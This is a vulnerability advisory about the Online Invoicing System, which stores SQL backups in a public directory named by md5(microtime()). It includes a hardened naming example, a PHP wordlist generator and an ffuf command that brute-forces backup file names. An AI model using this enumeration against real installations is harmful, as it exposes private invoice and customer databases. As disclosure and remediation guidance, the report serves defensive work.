online-invoicing-system

vulnerability insecure storage of backups and weak randomization
severity 5.9
language php
registry other

✍️ Description

The online invoicing system includes a backup feature that stores database dumps inside a publicly accessible directory (a .htaccess file forbids access to .sql files, but that protection is only honoured by Apache) and names each SQL dump with the MD5 of microtime(). This is insecure: microtime() is a time-dependent value, so the set of possible names can be enumerated and the MD5 hashes guessed.
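To make the weakness concrete, here is an added example (not code from the Online Invoicing System) that places the clock-derived naming scheme described above beside a hardened alternative: a name drawn from the CSPRNG and a dump written outside the web root with restrictive permissions. The function names and the backup directory are assumptions.

```php
<?php
// Added example, not the project's own code. Function names and the
// backup directory path are assumptions made for illustration.

// Naming scheme as described in the report: the whole name is derived from
// the clock, so anyone who knows roughly when a backup ran can enumerate it.
function weakBackupName(): string
{
    return md5(microtime()) . '.sql';
}

// Hardened alternative: 128 bits from the CSPRNG, independent of time.
function safeBackupName(): string
{
    return bin2hex(random_bytes(16)) . '.sql';
}

// Assumed location outside the document root, so no web server (Apache or
// otherwise) can serve the dumps regardless of .htaccess support.
$backupDir = '/var/lib/invoicing/backups';
if (!is_dir($backupDir) && !mkdir($backupDir, 0700, true)) {
    throw new RuntimeException("cannot create $backupDir");
}

// Restrict permissions before the file exists, then create it exclusively
// so an existing file is never overwritten.
umask(0077);
$path = $backupDir . '/' . safeBackupName();
$fh = fopen($path, 'x');
if ($fh === false) {
    throw new RuntimeException("cannot create $path");
}
fwrite($fh, "-- constructed placeholder dump\n"); // real code writes the SQL dump here
fclose($fh);

echo "weak name (clock-derived): " . weakBackupName() . "\n";
echo "safe name (random_bytes):  " . basename($path) . "\n";
```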

🕵️‍♂️ Proof of Concept

  • You can find installation instructions here: https://bigprof.com/appgini/applications/online-invoicing-system. This does not work on Apache, as a .htaccess file there forbids access to .sql files. Instead of Apache, you can use any other server, including PHP's built-in server.

  • As an administrator, create a backup of the database by going to /app/admin/pageBackupRestore.php in the application.

  • The backup files are now stored in /app/admin/backups/ with the name [MD5-hash].sql, where [MD5-hash] is md5(microtime()). microtime() returns the current Unix timestamp together with the microseconds, separated by a space.

  • A wordlist can be generated with the following PHP script. It accepts two arguments defining the time frame for which the wordlist is generated.

<?php
(isset($argv[1]) && isset($argv[2])) or exit(1);
$from = is_numeric($argv[1]) ? (int) $argv[1] : strtotime($argv[1]);
$to = is_numeric($argv[2]) ? (int) $argv[2] : strtotime($argv[2]);
if($from && $to) {
    for($i = $from; $i <= $to; $i++) {
        for($j = 0; $j < 1; $j += 0.00000001) {
            $microseconds = round($j, 8);
            echo md5(sprintf("%'01.8f ", $microseconds).$i)."\n";
        }
    }
} else {
    exit(1);
}
  • The script is used as php generateWordlist.php yesterday now > wordlist.txt, where "yesterday" is the starting time and "now" is the ending time.

  • After generating the wordlist, you can fuzz the URL to find the stored database dumps within the /app/admin/backups directory using any brute-forcer, such as ffuf:

ffuf -w wordlist.txt -u "http://localhost/app/admin/backups/FUZZ.sql" -mc 200

💥 Impact

Using this method, it is possible to find the SQL database dumps created within the application.

References